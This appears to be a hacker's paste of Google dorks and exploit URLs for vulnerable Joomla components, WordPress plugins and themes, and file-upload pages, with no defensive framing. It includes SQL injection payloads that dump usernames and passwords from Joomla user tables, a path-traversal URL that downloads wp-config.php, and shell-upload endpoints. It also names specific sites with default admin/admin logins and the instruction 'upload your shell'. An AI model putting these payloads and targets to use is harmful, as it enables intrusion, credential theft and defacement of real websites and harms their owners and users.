dork joom

1. # Exploit Title: Joomla Spider Calendar 3.2.6 SQL Injection
2. # endor Homepage : http://web-dorado.com/
3. # Google Dork: inurl:option=com_spidercalendar
4. # Exploit: /index.php?option=com_spidercalendar&calendar_id=1
5. ----
6. Exploit : http://web/wp-content/plugins/revslider/temp/update_extract/exp.php
7.  
8. Dork :
9.  
10. inurl:wp-content/plugins/revslider/
11.  
12. inurl:revslider
13.  
14. inurl:revslider_admin.php
15.  
16. inurl:revslider_front.php
17.  
18. inurl:plugins/revslider/
19.  
20. intext:Powered by Revslider
21.  
22. intitle:"Index Of/ revslider"
23.  
24. intitle:"Index Of/wp-content/themes/revslider"
25.  
26. intitle:"Index Of/wp-content/plugins/revslider"
27.  
28. intitle:"Index Of/admin/revslider"
29.  
30. intitle:"Index Of/fr/revslider"
31.  
32. intitle:"Index Of/en/revslider"
33.  
34. intitle:"Index Of/us/revslider"
35.  
36. intitle:"Index Of/ar/revslider"
37.  
38. intitle:"Index Of/es/revslider"
39.  
40. intitle:"Index Of/de/revslider"
41. -----
42. Easy-exploit-joomla-Sites
43. Dork:inurl:"index.php?option=com_simplephotogallery"
44.  
45.  
46.  
47. /index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat%28username,0x3a,password%29,3,4,5,6,7,8,9,10,11,12+from+jos_users--+
48. -----
49. Joomla Components (com_ignitegallery) SQL-Injection Vulnerabilities -
50.  
51. Dorks: inurl:com_ignitegallery , Exploits: /index.php?
52. option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)UAH,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
53. -----
54. Joomla Exploit : com maian15
55.  
56. Dork : "inurl:option=com_maian15"
57.  
58. Exploit:
59.  
60. /administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?
61. -----
62. Deface Metode Wordpress bazar Theme Arbitrary File Download Vulnerability
63.  
64. Dork: inurl:wp-content/themes/bazar/
65. exploit: /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
66. -----
67. exploit bypass admin
68. inurl
69. allinurl:galimg
70. inurl:galorg
71. index of /galorg site:ae
72. target
73. http://mspmt.com/adminaccess/welcome.asp
74. http://www.extrememarineme.com/adminaccess/welcome.asp
75. add
76. adminaccess/welcome.asp
77. user=admin pass=admin
78. adminaccess/gallery.aspx
79. upload your shell
80. http://mspmt.com/
81. -----
82. Upload dork and exploit :3
83. Dorks :
84.  
85. inurl:/upload.php
86. inurl /uploadbutton.html
87. inurl /upload-form.php
88. inurl /upload/up.php
89. inurl /upload.html
90. -----
91. Dokeos Upload
92.  
93. Dork:inurl:/index.php?include=Overview.html
94. Exploit:/main/inc/lib/fckeditor/editor/plugins/ImageManager/manager.php
95. -----
96. Dork : inurl:"admin/my_documents/my_files"
97. Exploit : admin/rte_popup_file_atch.asp
98. -----
99. Dork:inurl:"/mfm.php"
100. -----
101. Dork:intitle:"index of" people.lst.